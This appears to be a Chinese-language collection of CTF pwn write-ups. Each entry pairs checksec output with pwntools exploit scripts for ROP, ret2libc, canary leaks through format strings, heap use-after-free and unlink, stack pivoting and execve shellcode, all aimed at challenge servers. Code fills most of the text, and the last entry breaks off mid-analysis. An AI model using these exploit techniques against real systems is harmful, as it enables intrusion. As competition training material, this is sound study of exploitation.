[LitCTF 2024]ATM

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ checksec flag

[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import*
from LibcSearcher import*
r=remote("node4.anna.nssctf.cn",22296)
#r=process("./flag")
context(arch='amd64', os='linux', log_level='debug')
r.sendline(b"aaa")
sleep(0.5)
r.sendline(b"3")
sleep(0.5)
r.sendline(b"200")
sleep(0.5)
r.sendline(b"1")
r.recvline()
r.sendline(b"5")
r.recvuntil(b"0x")
addr=int(r.recv(12),16)
print(hex(addr))
libc=LibcSearcher("printf",addr)
libc_base=addr-libc.dump("printf")
system=libc_base+libc.dump("system")
binsh=libc_base+libc.dump("str_bin_sh")
pop_rdi=0x0000000000401233
ret=0x000000000040101a
payload=b'a'*(0x160+8)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
r.sendline(payload)
r.sendlineafter('4.Exit\n', '4')
#gdb.attach(r)
r.interactive()

[MoeCTF 2022]rop64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12




1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import*
context(arch='amd64', os='linux', log_level='debug')
r=remote("node5.anna.nssctf.cn",20801)
#r=process("./flag")
payload=b'a'*0x24+b"bbbb"
r.sendline(payload)
r.recvuntil(b"bbbb\n")
canary=u64(r.recv(7).rjust(8,b"\x00"))
print(hex(canary))
binsh=0x404058
system=0x401284
pop_rdi=0x00000000004011de
ret=0x000000000040101a
payload=b'a'*(0x28)+p64(canary)+p64(0)+p64(pop_rdi)+p64(binsh)+p64(system)
#gdb.attach(r)
r.sendline(payload)

r.interactive()

NSSCTF{7312416d-afd0-4eab-84d3-41119031a887}

[HNCTF 2022 WEEK4]ez_uaf

注意patchelf不然本地打不通

保护

1
2
3
4
5
6
7
8
9
10
11
12
13
~ via C v11.4.0-gcc via 🐍 v3.10.12 

❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Stripped: No

IDA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from pwn import*
context(arch='amd64', os='linux', log_level='debug')
p = remote('node5.anna.nssctf.cn',21119)
libc = ELF('./libc-2.27.so')
def d():
gdb.attach(p)
pause()
def add(size,name,content):
p.sendlineafter(": \n",'1')
p.sendlineafter(":\n",str(size))
p.sendafter(": \n",name)
p.sendafter(":\n",content)
def edit(index,content):
p.sendlineafter(": \n",'4')
p.sendlineafter(":\n",str(index))
p.send(content)
def delete(index):
p.sendlineafter(": \n",'2')
p.sendlineafter(":\n",str(index))
def show(index):
p.sendlineafter(": \n",'3')
p.sendlineafter(":\n",str(index))

add(0x410,'00000000','aaaaaaaa')
add(0x50,'11111111','bbbbbbbb')
add(0x60,'2222222','cccccccc')
delete(0)
show(0)
fd = u64(p.recv(6).ljust(8,b"\x00"))
fd = u64(p.recv(6).ljust(8,b"\x00"))
print(hex(fd))

base = fd - 0x70 - libc.symbols['__malloc_hook']

free_hook = base +libc.symbols['__free_hook']

print(hex(free_hook))

gadget = 0x4f302+base

delete(1)

edit(1,p64(free_hook))

add(0x50,'11111111','bbbbbbbb')

add(0x50,'11111111',p64(gadget))

delete(2)

p.interactive()
#d()


[MoeCTF 2021]babyrop

1
2
3
4
5
6
7
8
9
10
11
12
13
[*] '/home/voyager/flag'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12




法1

1
2
3
4
5
6
7
8
9
10
from pwn import*
#r=process("./flag")
r=remote("node5.anna.nssctf.cn",25970)
elf=ELF("./flag")
payload=b'a'*(0x28+4)+p32(elf.plt["gets"])+p32(elf.plt["system"])+p32(0x804A028)+p32(0x804A028)
r.sendline(payload)
pause()
#gdb.attach(r)
r.sendline(b"/bin/sh")
r.interactive()

NSSCTF{051c5534-ad4e-464f-b341-037ab1e72d7c}

法2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import*
from LibcSearcher import*
#r=process("./flag")
context(log_level='debug')
r=remote("node5.anna.nssctf.cn",25970)
elf=ELF("./flag")
payload=b'a'*(0x28+4)+p32(elf.plt["puts"])+p32(0x8048521)+p32(elf.got["puts"])
r.sendline(payload)
pause()
r.recvuntil(b"advise?\n")
addr=u32(r.recv(4))
print(hex(addr))
libc=LibcSearcher("puts",addr)
libc_base=addr-libc.dump("puts")
sys=libc_base+libc.dump("system")
binsh=libc_base+libc.dump("str_bin_sh")
payload=b'a'*(0x28+4)+p32(sys)+p32(0x8048521)+p32(binsh)
r.sendline(payload)
#gdb.attach(r)
r.interactive()

[SWPUCTF 2024 秋季新生赛]金丝雀

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12


根据偏移查找到canary位于%67$p,libc_start_main位于%89$p,但是输入太短了,所以我们采用让其返回到main函数就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import*
from LibcSearcher import*
context(log_level='debug')
#r=process("./flag")
r=remote("node6.anna.nssctf.cn",24690)
r.recvuntil(b"name\n")
payload=b"%67$p"
r.sendline(payload)
r.recvuntil(b"0x")
canary=int(r.recv(16),16)
print(hex(canary))
elf=ELF("./flag")
plt=elf.plt["puts"]
got=elf.got["puts"]
pop_rdi=0x0000000000401313
ret=0x000000000040101a
payload=b'a'*(0x100-0x8)+p64(canary)+p64(0)+p64(pop_rdi)+p64(got)+p64(plt)+p64(0x4011fd)
r.recvuntil(b"Welcome to NSSCTF\n")
r.sendline(payload)
puts=u64(r.recv(6).ljust(8,b"\x00"))
#gdb.attach(r)
r.recvuntil(b"name\n")
r.sendline(b"aaaa")
r.recvuntil(b"NSSCTF\n")
#r.recvuntil(b"Welcome to NSSCTF\n")
#gdb.attach(r)
libc=LibcSearcher("puts", puts)
libc_base=puts-libc.dump("puts")
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")
payload=b'a'*(0x100-0x8)+p64(canary)+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(ret)+p64(system)
r.sendline(payload)
r.interactive()

[NSSRound#30 Duo]vulnn

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ checksec vuln
[*] '/home/voyager/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import*
#r=process("./vuln")
r=remote("node1.anna.nssctf.cn",25716)
context(log_level='debug')
elf=ELF("./vuln")
libc=ELF("./libc.so.6")
plt=elf.plt["puts"]
got=elf.got["puts"]
r.recvuntil(b"qwq\n")
#gdb.attach(r)
payload=b'a'*(0x48)+p64(plt)+p64(0x401196)
r.sendline(payload)
r.recvuntil(b"byby")
addr=u64(r.recv(6).ljust(8,b"\x00"))
print(hex(addr))
#gdb.attach(r)
libc_base=addr-0x62050
binsh=next(libc.search("/bin/sh"))+libc_base
system=libc.symbols["system"]+libc_base
pop_rdi=0x000000000002a3e5+libc_base
payload=b'a'*(0x48)+p64(0x000000000040101a)+p64(pop_rdi)+p64(binsh)+p64(system)
#gdb.attach(r)
r.sendline(payload)
r.interactive()

2014 HITCON stkof

1
2
3
4
5
6
7
8
9
10
11
12
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

~ via C v11.4.0-gcc via 🐍 v3.10.12



分析IDA可知,输入1是申请堆,然后是输出大小,0x602100存放的是堆的编号,0x602148存放的是堆的地址

1
2
3
4
5
6
7
8
pwndbg> x/10gx 0x602100
0x602100: 0x0000000000000001 0x0000000000000000
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000000000
0x602130: 0x0000000000000000 0x0000000000000000
0x602140: 0x0000000000000000 0x0000000000e056b0
pwndbg>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import*
r=process("./flag")
def add(size):
r.sendline(b"1")
r.sendline(str(size))
r.recvuntil(b"OK\n")
def edit(idx, size, content):
r.sendline(b'2')
r.sendline(str(idx))
r.sendline(str(size))
r.send(content)
r.recvuntil(b'OK\n')
def free(idx):
r.sendline(b'3')
r.sendline(str(idx))
add(0x100)
add(0x20)
add(0x80)
payload=p64(0)+p64(0x20)+p64(0x602140-0x8)+p64(0x602140)+p64(0x20)+p64(0x90)
edit(2,len(payload),payload)
#这是为了填充tcachebin,不然无法成功
for i in range(7):
add(0x80)
for i in range(7):
free(i+4)
#gdb.attach(r)
free(3)
r.recvuntil(b'OK\n')
gdb.attach(r)
r.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> x/20gx 0x602140
0x602140: 0x0000000000000000 0x000000001e5472b0
0x602150: 0x0000000000602138 0x0000000000000000
0x602160: 0x0000000000000000 0x0000000000000000
0x602170: 0x0000000000000000 0x0000000000000000
0x602180: 0x0000000000000000 0x0000000000000000
0x602190: 0x0000000000000000 0x0000000000000000
0x6021a0: 0x0000000000000000 0x0000000000000000
0x6021b0: 0x0000000000000000 0x0000000000000000
0x6021c0: 0x0000000000000000 0x0000000000000000
0x6021d0: 0x0000000000000000 0x0000000000000000
pwndbg>

unlink前堆的布置结构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
pwndbg> x/10gx 0x602140
0x602140: 0x0000000000000000 0x000000001af572b0
0x602150: 0x000000001af577d0 0x000000001af57800
0x602160: 0x0000000000000000 0x0000000000000000
0x602170: 0x0000000000000000 0x0000000000000000
0x602180: 0x0000000000000000 0x0000000000000000
pwndbg> x/30gx 0x1af577d0
0x1af577d0: 0x0000000000000000 0x0000000000000020
0x1af577e0: 0x0000000000602138 0x0000000000602140
0x1af577f0: 0x0000000000000020 0x0000000000000090
0x1af57800: 0x0000000000000000 0x0000000000000000
0x1af57810: 0x0000000000000000 0x0000000000000000
0x1af57820: 0x0000000000000000 0x0000000000000000
0x1af57830: 0x0000000000000000 0x0000000000000000
0x1af57840: 0x0000000000000000 0x0000000000000000
0x1af57850: 0x0000000000000000 0x0000000000000000
0x1af57860: 0x0000000000000000 0x0000000000000000
0x1af57870: 0x0000000000000000 0x0000000000000000
0x1af57880: 0x0000000000000000 0x0000000000000091
0x1af57890: 0x000000000001af57 0x4b8dd6b79589c904
0x1af578a0: 0x0000000000000000 0x0000000000000000
0x1af578b0: 0x0000000000000000 0x0000000000000000
pwndbg>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from pwn import*
r=process("./flag")
context(log_level='debug')
elf=ELF("./flag")
libc=ELF("./libc.so.6")
def add(size):
r.sendline(b"1")
r.sendline(str(size))
r.recvuntil(b"OK\n")
def edit(idx, size, content):
r.sendline(b'2')
r.sendline(str(idx))
r.sendline(str(size))
r.send(content)
r.recvuntil(b'OK\n')


def free(idx):
r.sendline(b'3')
r.sendline(str(idx))



add(0x100)
add(0x20)
add(0x80)
payload=p64(0)+p64(0x20)+p64(0x602140-0x8)+p64(0x602140)+p64(0x20)+p64(0x90)
edit(2,len(payload),payload)

for i in range(7):
add(0x80)
for i in range(7):
free(i+4)
#gdb.attach(r)
free(3)
r.recvuntil(b'OK\n')
#gdb.attach(r)
payload=b'a'*(0x8)+p64(elf.got["free"])+p64(elf.got["puts"])+p64(elf.got["atoi"])
edit(2,len(payload),payload)
payload=p64(elf.plt["puts"])
edit(0,0x8,payload)
free(1)
r.recvuntil(b"OK\nOK\nOK\nOK\nOK\nOK\nOK\n")
puts=u64(r.recv(6).ljust(8,b"\x00"))
print(hex(puts))
libc_base = puts - libc.symbols['puts']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
system_addr = libc_base + libc.symbols['system']
payload = p64(system_addr)
print(hex(system_addr))
edit(2, len(payload), payload)
gdb.attach(r)
r.send(p64(binsh_addr))
r.interactive()

[NSSRound#9 Basic]MyMem

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12

1
2
3
4
5
6
7
8
9
10
❯ seccomp-tools dump ./flag
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x02 0xc000003e if (A != ARCH_X86_64) goto 0004
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0005
0004: 0x06 0x00 0x00 0x00000000 return KILL
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW

1
2
3
4
5
6
7
8
9
10
11
from pwn import*
#r=process("./flag")
context(log_level='debug',arch='amd64', os='linux')
r=remote("node5.anna.nssctf.cn",27659)
addr = 0x50000
offset = 0x100
value = addr + offset

payload = asm(shellcraft.open('/home/ctf/flag.txt') + shellcraft.read(3, value, 0x30) + shellcraft.write(1, value, 0x30))
r.sendlineafter(b'sandbox\n', payload)
r.interactive()
1
2
3
4
5
6
7
8
9
10
11
from pwn import*
#r=process("./flag")
context(log_level='debug',arch='amd64', os='linux')
r=remote("node5.anna.nssctf.cn",27659)
addr = 0x50000
offset = 0x100
value = addr + offset

payload = asm(shellcraft.cat('/home/ctf/flag.txt')
r.sendlineafter(b'sandbox\n', payload)
r.interactive()

ciscn_2019_n_5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import*
from LibcSearcher import*
context(log_level='debug',arch='amd64', os='linux')
#r=process("./flag")
r=remote("node5.buuoj.cn",27047)
pop_rdi=0x0000000000400713
elf=ELF("./flag")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]

r.recvuntil(b"tell me your name\n")
r.sendline(b"1")
r.recvuntil(b"What do you want to say to me?\n")
payload=b'a'*(0x20+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x400636)
r.sendline(payload)
#gdb.attach(r)
puts = u64(r.recv(6).ljust(8, b'\x00'))
print(hex(puts))
#gdb.attach(r)
libc=LibcSearcher("puts", puts)
libc_base=puts-libc.dump("puts")
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump("str_bin_sh")
r.recvuntil(b"tell me your name\n")
r.sendline(b"1")
r.recvuntil(b"What do you want to say to me?\n")
payload=b'a'*(0x20+8)+p64(0x00000000004004c9)+p64(pop_rdi)+p64(binsh)+p64(system)
r.sendline(payload)
r.interactive()
r.interactive()

ciscn_2019_c_1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import*
from LibcSearcher import*
context(log_level='debug',arch='amd64', os='linux')
#r=process("./flag")
r=remote("node5.buuoj.cn",29245)
pop_rdi=0x0000000000400c83
elf=ELF("./flag")
r.sendline(b"1")
r.recvuntil(b"to be encrypted\n")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
payload=b'a'*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x400b28)
r.sendline(payload)
r.recvline()
r.recvline()
puts = u64(r.recv(6).ljust(8, b'\x00'))
print(hex(puts))
#gdb.attach(r)
libc=LibcSearcher("puts", puts)
libc_base=puts-libc.dump("puts")
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump("str_bin_sh")
r.sendline(b'1')
pause()
payload=b'a'*(0x50+8)+p64(0x00000000004006b9)+p64(pop_rdi)+p64(binsh)+p64(system)
r.sendline(payload)
r.interactive()

[HDCTF 2023]Makewish

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ checksec flag
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /home/voyager/.cache/.pwntools-cache-3.10/update to 'never' (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[!] An issue occurred while checking PyPI
[*] You have the latest version of Pwntools (4.14.1)
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12 took 5s




IDA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
int __fastcall main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+8h] [rbp-38h] BYREF
int v5; // [rsp+Ch] [rbp-34h]
char buf[40]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v7; // [rsp+38h] [rbp-8h]

v7 = __readfsqword(0x28u);
init(argc, argv, envp);
v5 = rand() % 1000 + 324;
puts("tell me you name\n");
read(0, buf, 0x30u);
puts("hello,");
puts(buf);
puts("tell me key\n");
read(0, &v4, 4u);
if ( v5 == v4 )
return vuln();
puts("failed");
return 0;
}

首先可以通过覆盖canary的\x00来泄露canary的值

1
2
3
4
5
6
7
8
9
10
11
from pwn import*
r=process("./flag")
r.recvuntil(b"me you name\n\n")
payload=b'a'*0x24+b'bbbb'
r.sendline(payload)
r.recvuntil(b"bbbb\n")
canary=u64(r.recv(7).rjust(8,b"\x00"))
print(hex(canary))
gdb.attach(r)
r.interactive()

成功

1770815364489

然后是看伪随机数,gdb调试一下可以得到其为707

1770815592478

然后我们输入看看

1770815882150

成功进入vuln()函数,但是eof了,这是因为只要求读入4字节,p64()是8字节,改为p32()就好了

1770816009674

然后我们看一下vuln()函数,非常有意思

1
2
3
4
5
6
7
8
9
10
11
12
__int64 vuln()
{
_BYTE buf[88]; // [rsp+0h] [rbp-60h] BYREF
unsigned __int64 v2; // [rsp+58h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("welcome to HDctf,You can make a wish to me");
buf[(int)read(0, buf, 0x60u)] = 0; #这个意思是读入最多0x60个字节并将读入的长度x,将buf[x]设为0
puts("sorry,i can't do that");
return 0;
}

我们看下此时stack布局,非常好有个自带的leave函数,那我们可以通过栈迁移试试,我们读入0x60的数据,buf[0x60]=”\x00”,那么rbp的末位覆盖为”\x00”,也就是rbp地址会改为0x7ffd28f8be90,那么只需要将system放到0x7ffd28f8be98就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
wndbg> stack 40
00:0000│ rsi rsp 0x7ffd28f8bde0 ◂— 0xa0a61616161 /* 'aaaa\n\n' */
01:0008│-058 0x7ffd28f8bde8 —▸ 0x7764f4e8cec3 (_IO_file_overflow+259) ◂— cmp eax, -1
02:0010│-050 0x7ffd28f8bdf0 ◂— 0xc /* '\x0c' */
03:0018│-048 0x7ffd28f8bdf8 —▸ 0x7764f501b780 (_IO_2_1_stdout_) ◂— 0xfbad2887
04:0020│-040 0x7ffd28f8be00 —▸ 0x400a1a ◂— je 0x400a81 /* 'tell me key\n' */
05:0028│-038 0x7ffd28f8be08 —▸ 0x7764f4e80faa (puts+346) ◂— cmp eax, -1
06:0030│-030 0x7ffd28f8be10 ◂— 0
07:0038│-028 0x7ffd28f8be18 —▸ 0x7764f4e46268 (random+56) ◂— xor eax, eax
08:0040│-020 0x7ffd28f8be20 ◂— 0
09:0048│-018 0x7ffd28f8be28 —▸ 0x7ffd28f8be90 ◂— 1
0a:0050│-010 0x7ffd28f8be30 —▸ 0x7ffd28f8bfa8 —▸ 0x7ffd28f8d411 ◂— 0x530067616c662f2e /* './flag' */
0b:0058│-008 0x7ffd28f8be38 ◂— 0x91171012d9061800
0c:0060│ rbp 0x7ffd28f8be40 —▸ 0x7ffd28f8be90 ◂— 1
0d:0068│+008 0x7ffd28f8be48 —▸ 0x400901 (main+193) ◂— leave
0e:0070│+010 0x7ffd28f8be50 —▸ 0x7ffd28fbf000 ◂— jg 0x7ffd28fbf047
0f:0078│+018 0x7ffd28f8be58 ◂— 0x2c3000002c3
10:0080│+020 0x7ffd28f8be60 ◂— 0x6161616161616161 ('aaaaaaaa')


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import*
r=process("./flag")
#r=remote("node4.anna.nssctf.cn",25049)
r.recvuntil(b"me you name\n\n")
payload=b'a'*0x24+b'bbbb'
r.sendline(payload)
r.recvuntil(b"bbbb\n")
canary=u64(r.recv(7).rjust(8,b"\x00"))
print(hex(canary))
r.recvuntil(b"tell me key\n\n")
r.send(p32(0x2c3))
sys=0x4007c7
ret=0x04005d9
#gdb.attach(r)
payload=b'a'*(0x20)+p64(ret)+p64(sys)+b'a'*(0x28)+p64(canary)
r.recvuntil(b"me\n")
#gdb.attach(r)
r.sendline(payload)
#gdb.attach(r)
r.interactive()

因为aslr,这个要多打几次才可以匹配上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
pwndbg> stack 30
00:0000│ rsi rsp 0x7ffc40e7d5e0 ◂— 0x6161616161616161 ('aaaaaaaa')
... 3 skipped
04:0020│-040 0x7ffc40e7d600 —▸ 0x4005d9 (_init+25) ◂— ret
05:0028│-038 0x7ffc40e7d608 —▸ 0x4007c7 (treasure) ◂— push rbp
06:0030│-030 0x7ffc40e7d610 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
... 4 skipped
0b:0058│-008 0x7ffc40e7d638 ◂— 0xc2d8387d63f9f000
0c:0060│ rbp 0x7ffc40e7d640 —▸ 0x7ffc40e7d690 ◂— 1
0d:0068│+008 0x7ffc40e7d648 —▸ 0x400901 (main+193) ◂— leave
0e:0070│+010 0x7ffc40e7d650 —▸ 0x7ffc40eb4000 ◂— jg 0x7ffc40eb4047
0f:0078│+018 0x7ffc40e7d658 ◂— 0x2c3000002c3
10:0080│+020 0x7ffc40e7d660 ◂— 0x6161616161616161 ('aaaaaaaa')
... 3 skipped
14:00a0│+040 0x7ffc40e7d680 ◂— 0x6262626261616161 ('aaaabbbb')
15:00a8│+048 0x7ffc40e7d688 ◂— 0xc2d8387d63f9f00a
16:00b0│+050 0x7ffc40e7d690 ◂— 1
17:00b8│+058 0x7ffc40e7d698 —▸ 0x70b5efc29d90 (__libc_start_call_main+128) ◂— mov edi, eax
18:00c0│+060 0x7ffc40e7d6a0 ◂— 0
19:00c8│+068 0x7ffc40e7d6a8 —▸ 0x400840 (main) ◂— push rbp
1a:00d0│+070 0x7ffc40e7d6b0 ◂— 0x140e7d790
1b:00d8│+078 0x7ffc40e7d6b8 —▸ 0x7ffc40e7d7a8 —▸ 0x7ffc40e7f411 ◂— 0x530067616c662f2e /* './flag' */
1c:00e0│+080 0x7ffc40e7d6c0 ◂— 0
1d:00e8│+088 0x7ffc40e7d6c8 ◂— 0x753f720b0b0a5ae8
pwndbg>



1770818644294

搞定,可惜环境连接不上,又浪费了30金币

[GCCCTF 2025]昔涟的礼物

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
SHSTK: Enabled
IBT: Enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12




1
2
3
4
5
6
7
from pwn import*
#r=process("./flag")
r=remote("node1.anna.nssctf.cn",22065)
payload=b'a'*(0x310-0x4)+p64(1)
r.sendline(payload)
r.interactive()

[BJDCTF 2020]babyrop2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12




gdb分析:canary位置在%7$p,然后可以通过泄露puts函数地址来得到libc偏移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
pwndbg> stack 30
00:0000│ rsp 0x7fffffffdf68 —▸ 0x40085c (gift+72) ◂— mov edi, 0x400a05
01:0008│ rdi 0x7fffffffdf70 ◂— 0x61616161 /* 'aaaa' */
02:0010│-008 0x7fffffffdf78 ◂— 0x32f47a8894de0600
03:0018│ rbp 0x7fffffffdf80 —▸ 0x7fffffffdfa0 ◂— 1
04:0020│+008 0x7fffffffdf88 —▸ 0x400905 (main+43) ◂— mov eax, 0
05:0028│+010 0x7fffffffdf90 ◂— 0x1000
06:0030│+018 0x7fffffffdf98 ◂— 0x32f47a8894de0600
07:0038│+020 0x7fffffffdfa0 ◂— 1
08:0040│+028 0x7fffffffdfa8 —▸ 0x7ffff7c29d90 (__libc_start_call_main+128) ◂— mov edi, eax
09:0048│+030 0x7fffffffdfb0 ◂— 0



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import*
from LibcSearcher import*
#r=process("./flag")
r=remote("node4.anna.nssctf.cn",27183)
elf=ELF("./flag")
r.recvuntil(b"I'll give u some gift to help u!\n")
payload=b"%7$p"
r.sendline(payload)
canary=int(r.recv(18),16)
print(hex(canary))
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
rdi_ret=0x400993
ret=0x004005f9

r.recvuntil(b"ll me u story!\n")
payload=b'a'*(0x20-8)+p64(canary)+p64(0)+p64(rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(0x400887)
r.sendline(payload)
puts=u64(r.recv(7)[:6].ljust(8,b"\x00"))
print(hex(puts))
libc=LibcSearcher("puts", puts)
libc_base=puts-libc.dump("puts")
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")
payload=b'a'*(0x20-8)+p64(canary)+p64(0)+p64(ret)+p64(rdi_ret)+p64(bin_sh)+p64(system)
r.recvuntil(b"ll me u story!\n")
r.sendline(payload)
r.interactive()

//glibc版本打7

[玄武杯 2025]ret2shellcode

这题有一个注意点,就是gets遇到\x0a(\n)时会结束,所以shellcode不包含\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
SHSTK: Enabled
IBT: Enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12




1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import*
r=process("./flag")
#r=remote('node1.anna.nssctf.cn',26729)
context(log_level='debug')
r.recvuntil(b"buf @ ")
addr=int(r.recv(14),16)
print(hex(addr))
shellcode=shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
#gdb.attach(r)

payload=shellcode+b'a'*(0x40+8-len(shellcode))+p64(addr)
r.sendlineafter(b"ret2shellcode!\n",payload)
r.interactive()

好气啊,本地打通了结果连接不上,管环境重新开还是nc不上,浪费60金币~~,没金币了

[深育杯 2021]find_flag

checksec一下:

1
2
3
4
5
6
7
8
9
10
11
lion@lion-virtual-machine:~$ checksec find_flag
[*] '/home/lion/find_flag'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
lion@lion-virtual-machine:~$

发现漏洞函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
unsigned __int64 sub_132F()
{
char format[32]; // [rsp+0h] [rbp-60h] BYREF
_BYTE v2[56]; // [rsp+20h] [rbp-40h] BYREF
unsigned __int64 v3; // [rsp+58h] [rbp-8h]

v3 = __readfsqword(0x28u);
printf("Hi! What's your name? ");
gets(format);
printf("Nice to meet you, ");
strcat(format, "!\n");
printf(format);
printf("Anything else? ");
gets(v2);
return __readfsqword(0x28u) ^ v3;
}

我们可以猜测一下,通过格式化字符串漏洞获取canary和地址,然后进行栈溢出

gdb查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> stack 50
